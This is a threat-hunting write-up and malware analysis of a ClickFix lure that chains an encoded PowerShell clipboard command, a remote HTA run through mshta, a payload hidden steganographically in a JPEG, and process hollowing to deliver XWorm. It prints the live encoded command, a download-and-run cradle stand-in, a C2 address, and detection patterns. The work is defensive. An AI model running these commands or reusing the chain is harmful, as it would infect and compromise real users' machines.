Modern malware delivery has shifted heavily toward web-based mechanisms. Unlike traditional payload delivery, web infrastructure gives attackers flexibility and control. Payloads can change dynamically depending on the visitor, infrastructure can rotate without rebuilding campaigns, and attackers can track victims using analytics techniques borrowed directly from marketing playbooks.
Most importantly, attackers can fingerprint environments—identifying researchers or sandboxes—and selectively deliver payloads.
All of this activity surfaces in one place: the HTTP response body. While this layer is incredibly noisy, it also contains the most valuable signals for identifying modern threats.
Technique-Based Hunting vs Traditional Methods
There are two common approaches to hunting malicious web infrastructure.
The first is topical hunting, which focuses on keywords such as banking, shipping, or tax-related themes. This is effective for phishing campaigns that mimic known brands.
The second, and the one used here, is technique-based hunting. Instead of focusing on what a page says, it focuses on what the page does: behavioral indicators such as PowerShell execution, obfuscation patterns, clipboard manipulation, and encoded payloads. It is the more powerful of the two because a lure can change its theme and branding without changing the mechanics it relies on.
By shifting focus to attacker behavior, defenders can identify threats that would otherwise evade keyword-based detection.
Building a Strong Detection Signal
The core of this hunt relied on combining two key signals. The first signal was the presence of PowerShell references in HTTP response bodies. On its own, this produces thousands of benign results such as tutorials and documentation.
The second signal introduced obfuscation indicators. These included base64 decoding functions, JavaScript obfuscation patterns, encoded PowerShell commands, and clipboard API usage. By combining these two signals using logical AND conditions, the dataset was dramatically reduced. This ensured that only pages exhibiting both execution intent and obfuscation techniques were returned.
To further refine the results, known malicious infrastructure already flagged by Censys was excluded. This allowed the hunt to focus purely on previously undiscovered threats.
Eliminating Noise at Scale
Even with strong signals, noise remains a major challenge. Legitimate websites frequently include similar patterns, especially developer blogs or platforms with interactive code snippets.
To solve this, a three-layer negation strategy was applied.
The first layer removed known-good platforms such as cloud providers, SaaS platforms, and major web services. The second layer filtered out irrelevant HTTP status codes like redirects and error pages. The third layer introduced a large multilingual exclusion list targeting default server pages, parked domains, and maintenance templates. Each layer trades recall for precision: a lure hosted on a major cloud provider would be dropped by the first layer, so exclusions of this kind should be revisited rather than treated as permanent.
This aggressive filtering reduced the dataset to just 42 results—small enough to analyze effectively.
Using Clustering to Identify Campaigns
Instead of reviewing each result individually, the data was grouped by HTTP body hash. This allowed identical pages to be clustered together, revealing patterns of reuse across infrastructure.
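As an added example, not code from this write-up or from Censys, the hunt logic described above reduced to a small Python triage pass: the two AND-ed signals, the three negation layers, and clustering by SHA-256 of the response body, run over a constructed handful of response records. The hostnames, status codes, indicator regexes and exclusion phrases are assumptions chosen to mirror the description, not the actual query that was run.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample records shaped like a web-scan dataset (host, status, body).
# None of these hosts are real; they stand in for the kinds of pages the hunt saw.
SAMPLE_RESPONSES = [
    {"host": "blog.example.net", "status": 200,
     "body": "<h1>PowerShell tips</h1><pre>Get-Process | Sort-Object CPU</pre>"},
    {"host": "a.lure.example", "status": 200,
     "body": '<script>const c="powershell -w hidden -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8A";'
             'navigator.clipboard.writeText(c)</script>'},
    {"host": "b.lure.example", "status": 200,          # identical body: same campaign
     "body": '<script>const c="powershell -w hidden -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8A";'
             'navigator.clipboard.writeText(c)</script>'},
    {"host": "docs.cloudvendor.example", "status": 200,
     "body": "powershell -EncodedCommand ... see FromBase64String docs"},
    {"host": "old.example.org", "status": 302,
     "body": "powershell atob('x') moved"},
    {"host": "parked.example", "status": 200,
     "body": "This domain is parked. powershell atob('x')"},
]

# Signal 1: any PowerShell reference (thousands of benign hits on its own).
POWERSHELL = re.compile(r"powershell", re.I)

# Signal 2: obfuscation / execution-intent indicators (assumed set).
OBFUSCATION = (
    re.compile(r"\batob\s*\(", re.I),                                   # JS base64 decode
    re.compile(r"FromBase64String", re.I),                              # .NET base64 decode
    re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),  # encoded PS
    re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy", re.I),  # clipboard API
    re.compile(r"(?:\\u[0-9a-fA-F]{4}){4,}"),                           # runs of \u escapes
)

# Negation layer 1: known-good platforms (assumed suffixes).
KNOWN_GOOD_HOST_SUFFIXES = (".cloudvendor.example", ".saasvendor.example")
# Negation layer 2: only live, directly served pages are interesting.
INTERESTING_STATUS = {200}
# Negation layer 3: multilingual template / parked / maintenance phrases (assumed subset).
TEMPLATE_PHRASES = (
    "this domain is parked", "site under maintenance", "welcome to nginx",
    "apache2 default page", "esta página está en construcción",
    "diese seite befindet sich im aufbau",
)


def has_signal(body: str) -> bool:
    """Both signals must fire: PowerShell reference AND at least one obfuscation indicator."""
    return bool(POWERSHELL.search(body)) and any(p.search(body) for p in OBFUSCATION)


def is_noise(rec: dict) -> bool:
    """Apply the three negation layers; True means the record is dropped."""
    if rec["host"].lower().endswith(KNOWN_GOOD_HOST_SUFFIXES):
        return True
    if rec["status"] not in INTERESTING_STATUS:
        return True
    low = rec["body"].lower()
    return any(phrase in low for phrase in TEMPLATE_PHRASES)


def hunt(records: list) -> dict:
    """Return {sha256(body): [hosts]} for records that pass both signals and all negations.
    Grouping by body hash surfaces identical pages reused across infrastructure."""
    clusters = defaultdict(list)
    for rec in records:
        if has_signal(rec["body"]) and not is_noise(rec):
            digest = hashlib.sha256(rec["body"].encode("utf-8")).hexdigest()
            clusters[digest].append(rec["host"])
    return dict(clusters)


if __name__ == "__main__":
    for digest, hosts in hunt(SAMPLE_RESPONSES).items():
        print(digest[:16], len(hosts), hosts)
```

Only the two lure hosts survive, and they collapse into a single cluster because their bodies are byte-identical; the documentation page is dropped by the platform exclusion, the redirect by the status filter, and the parked page by the template list.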
Most results turned out to be noise. However, one cluster stood out: six identical pages hosted across subdomains of orcanmedikal[.]com[.]tr.
These pages presented a fake “AntiFraud Authenticator” interface—a classic ClickFix lure designed to trick users into executing malicious commands.
Inside the Attack Chain
The attack unfolds in five distinct stages, each carefully designed to evade detection.
The first stage is social engineering. The page asks the user to copy a "security code" and paste it; what the page actually writes to the clipboard is a PowerShell command, so the victim runs it themselves without ever downloading a file.
powershell -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAG0AcwBoAHQAYQAuAGUAeABlACAAaAB0AHQAcABzADoALwAvAG8AcgBjAGEAbgBtAGUAZABpAGsAYQBsAC4AYwBvAG0ALgB0AHIALwB0AG8AbwBsAC4AaAB0AGEAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMA
Decoded (the -EncodedCommand argument is base64 over UTF-16LE text): Start-Process mshta.exe hxxps://orcanmedikal[.]com[.]tr/tool[.]hta -Verb RunAs
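As an added example (not code from the write-up), a small Python decoder for the clipboard command above, followed by a triage pass that flags what an analyst would look for in the decoded text. The base64 blob is the one printed above; the flag names and patterns are my own assumptions.

```python
import base64
import re

# The clipboard command exactly as shown in the write-up.
CLIPBOARD_COMMAND = (
    "powershell -EncodedCommand "
    "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAG0AcwBoAHQAYQAuAGUAeABlACAAaAB0AHQAcABzADoALwAv"
    "AG8AcgBjAGEAbgBtAGUAZABpAGsAYQBsAC4AYwBvAG0ALgB0AHIALwB0AG8AbwBsAC4AaAB0AGEAIAAtAFYA"
    "ZQByAGIAIABSAHUAbgBBAHMA"
)

# PowerShell accepts unambiguous prefixes of -EncodedCommand; these are the common spellings.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Things worth flagging in a decoded one-liner (assumed triage set).
SUSPICIOUS = {
    "mshta": re.compile(r"\bmshta(?:\.exe)?\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "elevation": re.compile(r"-Verb\s+RunAs", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
}


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand value. PowerShell base64-encodes the UTF-16LE bytes
    of the script, so the decoded bytes are interleaved with NULs until decoded as UTF-16LE."""
    padded = blob + "=" * (-len(blob) % 4)          # tolerate stripped padding
    return base64.b64decode(padded).decode("utf-16le")


def triage(command_line: str):
    """Return (decoded script, sorted list of flags) for a PowerShell command line,
    or (None, []) when no encoded argument is present."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None, []
    script = decode_encoded_command(m.group(1))
    flags = sorted(name for name, pat in SUSPICIOUS.items() if pat.search(script))
    return script, flags


if __name__ == "__main__":
    script, flags = triage(CLIPBOARD_COMMAND)
    print(script)
    print("flags:", flags)
```

Any one of these flags on a command that arrived via the clipboard is worth an alert; all three together (a LOLBin, a remote URL and a UAC elevation request) leave little doubt.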
The second stage executes an HTA file with mshta.exe. Because the command uses -Verb RunAs, the victim is shown a UAC consent prompt, and if they accept, the HTA runs elevated. The script is heavily obfuscated with Unicode characters and padded with decoy code to confuse analysis tools.
HTA execution (tool.hta):
- Unicode emoji obfuscation (two different separator patterns)
- A passman() regex strips the separators to recover the base64 and the embedded PowerShell command
- WScript.Shell.Run(cmd, 0, false): window style 0 hides the window and false means the HTA does not wait for the command to finish
- A decoy AES-JS library inflates the file to confuse static analysis
The third stage retrieves a hidden payload from a JPEG file hosted on archive[.]org. The malware is embedded using steganography: a base64 block sits between two text markers inside the image data.
- PowerShell downloads the JPEG from archive[.]org (the file has since been removed)
- Extracts the base64 between the BaseStart-/BaseEnd markers in the image data
- Reflectively loads the resulting .NET assembly and invokes ClassLibrary1.Home.VAI()
The fourth stage is the PhantomVAI loader, which performs environment checks, downloads the next payload, and injects it into a legitimate process using process hollowing.
- VM detection (VirtualBox, VMware, VirtualPC)
- Downloads the payload from hxxps://4a-m[.]al/ConvertedFile[.]txt
- The payload is base64-encoded and then reversed; the loader reverses the string back, then base64-decodes it
- RunPE-style process hollowing into RegAsm.exe
- Persistence via a scheduled task and a startup registry entry
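As an added example, not code from the write-up or from the malware, the three decoding steps of stages 2 through 4 reproduced in Python over constructed stand-in artifacts: the emoji-separated base64 in the HTA, the base64 block between the markers inside the JPEG, and the reversed base64 text served as ConvertedFile.txt. The sample blobs, the literal marker bytes (the write-up names them BaseStart-/BaseEnd; the exact strings are assumed), and the function names are my assumptions.

```python
import base64
import re

# Anything outside the base64 alphabet is a separator to be discarded.
NOT_B64 = re.compile(r"[^A-Za-z0-9+/=]")


# ---- Stage 2: emoji-separated base64 inside the HTA (passman()-style cleanup) ----
def strip_separators(blob: str) -> str:
    """Whitelist-strip to the base64 alphabet. This is separator-agnostic, so it
    handles both emoji patterns without knowing which characters were used."""
    return NOT_B64.sub("", blob)


def decode_hta_payload(blob: str) -> str:
    return base64.b64decode(strip_separators(blob)).decode("utf-8", errors="replace")


# ---- Stage 3: base64 block between text markers inside a JPEG ----
def extract_between_markers(data: bytes, start: bytes = b"BaseStart-", end: bytes = b"BaseEnd") -> bytes:
    """Carve the base64 between the markers and return the decoded assembly bytes."""
    s = data.find(start)
    if s == -1:
        raise ValueError("start marker not found")
    s += len(start)
    e = data.find(end, s)
    if e == -1:
        raise ValueError("end marker not found")
    return base64.b64decode(strip_separators(data[s:e].decode("ascii", "ignore")))


# ---- Stage 4: string reversed after base64 encoding ----
def reverse_then_b64decode(text: str) -> bytes:
    return base64.b64decode(text.strip()[::-1])


def recover_chain(hta_blob: str, image_bytes: bytes, converted_txt: str) -> dict:
    return {
        "stage2_command": decode_hta_payload(hta_blob),
        "stage3_assembly": extract_between_markers(image_bytes),
        "stage4_payload": reverse_then_b64decode(converted_txt),
    }


# ---- Constructed stand-ins for the real artifacts (not the campaign's files) ----
_STAGE2_CMD = ("powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
               ".DownloadString('https://example.invalid/s')\"")
_B64 = base64.b64encode(_STAGE2_CMD.encode()).decode()
# Two alternating separator patterns, mimicking the HTA's emoji interleaving.
SAMPLE_HTA_BLOB = "".join(ch + ("🔒" if i % 3 else "🚀") for i, ch in enumerate(_B64))

_ASSEMBLY = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"   # PE magic only; a stand-in for a .NET DLL
SAMPLE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
               + b"BaseStart-" + base64.b64encode(_ASSEMBLY) + b"BaseEnd"
               + b"\x00" * 16 + b"\xff\xd9")

_FINAL = b"XWORM-STAGE-STANDIN"
SAMPLE_CONVERTED_TXT = base64.b64encode(_FINAL).decode()[::-1]


if __name__ == "__main__":
    r = recover_chain(SAMPLE_HTA_BLOB, SAMPLE_JPEG, SAMPLE_CONVERTED_TXT)
    print(r["stage2_command"])
    print(r["stage3_assembly"][:4], len(r["stage3_assembly"]), "bytes")
    print(r["stage4_payload"])
```

The point of the stage 3 check on the first two bytes is that a reflectively loaded .NET assembly is still a PE file, so a carved block that does not start with MZ means the markers or the decoding step were wrong, not that the sample is clean.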
Finally, the fifth stage delivers XWorm V5.6, a full-featured remote access trojan capable of credential theft, surveillance, and system control.
- C2: 86.106.85[.]194:9000
- Campaign: "XWorm V5.6"
- Mutex: UGUHrsQaOFvrEntr
Notable Indicators of Compromise (IOCs)
Several high-confidence indicators emerged from this investigation:
- Domain: orcanmedikal[.]com[.]tr
- Payload staging: 4a-m[.]al
- C2 server: 86.106.85[.]194:9000
- Mutex: UGUHrsQaOFvrEntr
- LOLBins: mshta.exe, RegAsm.exe
- File hashes and artifacts across all five stages
These indicators provide actionable intelligence for both detection and threat hunting teams.
Defensive Takeaways
This campaign highlights how attackers combine simple techniques—like base64 encoding and string reversal—with advanced delivery methods such as steganography and process injection.
For defenders, this means traditional signature-based detection is not sufficient on its own. Monitoring behavioral indicators is critical: PowerShell launched with an encoded command from a user's shell, mshta.exe fetching a remote HTA, RegAsm.exe making network connections, and web content that writes commands to the clipboard.
Network monitoring should also focus on suspicious outbound connections, especially to known staging domains and to uncommon ports such as the TCP/9000 C2 port seen here.
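As an added example (not from the write-up, and not a rule set from any product), the behavioral indicators above expressed as a few rules in Python and run over constructed Sysmon-style process and network events. The event shapes, the field names and the port list are assumptions; the indicators themselves (encoded PowerShell, mshta with a remote HTA, RegAsm.exe talking to the network, an uncommon outbound port) come from the stages described in this case.

```python
import re

# Constructed events (not real telemetry) in a simplified Sysmon-like shape.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://lure.example/tool.hta",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAg",
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "network", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "dst": "203.0.113.10", "dport": 9000},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1",
     "parent": r"C:\Windows\System32\svchost.exe"},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst": "198.51.100.7", "dport": 443},
]

# .NET framework utilities that have no business opening sockets (assumed list;
# RegAsm and mshta are from this case, the others are well-known siblings).
LOLBIN_NET = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe", "mshta.exe"}
# Ports treated as ordinary egress (assumed baseline).
COMMON_PORTS = {80, 443, 53, 853}


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def rule_mshta_remote(e: dict) -> bool:
    return (e["type"] == "process" and basename(e["image"]) == "mshta.exe"
            and re.search(r"https?://", e["cmdline"], re.I) is not None)


def rule_powershell_encoded(e: dict) -> bool:
    return (e["type"] == "process" and basename(e["image"]) == "powershell.exe"
            and re.search(r"\s-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}",
                          e["cmdline"], re.I) is not None)


def rule_pasted_into_shell(e: dict) -> bool:
    """ClickFix pattern: PowerShell spawned directly from the user's shell, not a service."""
    return (rule_powershell_encoded(e) and basename(e["parent"]) == "explorer.exe")


def rule_lolbin_outbound(e: dict) -> bool:
    return e["type"] == "network" and basename(e["image"]) in LOLBIN_NET


def rule_uncommon_port(e: dict) -> bool:
    return e["type"] == "network" and e["dport"] not in COMMON_PORTS


RULES = [
    ("mshta_remote_hta", rule_mshta_remote),
    ("powershell_encoded", rule_powershell_encoded),
    ("powershell_pasted_into_shell", rule_pasted_into_shell),
    ("lolbin_outbound", rule_lolbin_outbound),
    ("uncommon_port", rule_uncommon_port),
]


def evaluate(events: list) -> list:
    """Return sorted (rule name, event index) pairs for every rule that fires."""
    hits = [(name, i) for i, e in enumerate(events) for name, fn in RULES if fn(e)]
    return sorted(hits)


if __name__ == "__main__":
    for name, i in evaluate(EVENTS):
        print(f"{name:30s} event {i}: {basename(EVENTS[i]['image'])}")
```

The benign PowerShell run from svchost.exe and the browser's HTTPS connection produce nothing, while the three events that mirror stages 1, 2 and 4 each fire at least one rule; the RegAsm.exe connection fires two, which is the kind of overlap worth escalating rather than suppressing.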
Our Perspective on This Case
What makes this campaign particularly interesting is not just its sophistication, but its practicality. None of the individual techniques used are groundbreaking. In fact, many of them—like base64 encoding, LOLBins, and simple obfuscation—are well known and widely documented.
However, the real strength lies in how these techniques are combined. Each stage of the attack appears relatively benign in isolation. A JPEG file, a PowerShell command, or a system binary execution might not raise immediate alarms. But when chained together, they create a highly effective and stealthy attack flow.
This reflects a broader trend in modern cyber threats. Attackers are moving away from complex, easily detectable malware toward modular, layered approaches that blend into normal system behavior.
Another key takeaway is the importance of technique-based hunting. Traditional keyword or signature-based detection would likely miss this campaign entirely. By focusing on behavioral patterns instead, defenders can uncover threats that are still under the radar.
Finally, this case reinforces the need for proactive threat hunting. Waiting for alerts is no longer enough. Organizations must actively search for suspicious patterns within their environments to stay ahead of evolving threats.
In short, this campaign is a strong reminder that effective defense today requires both technical depth and strategic thinking.
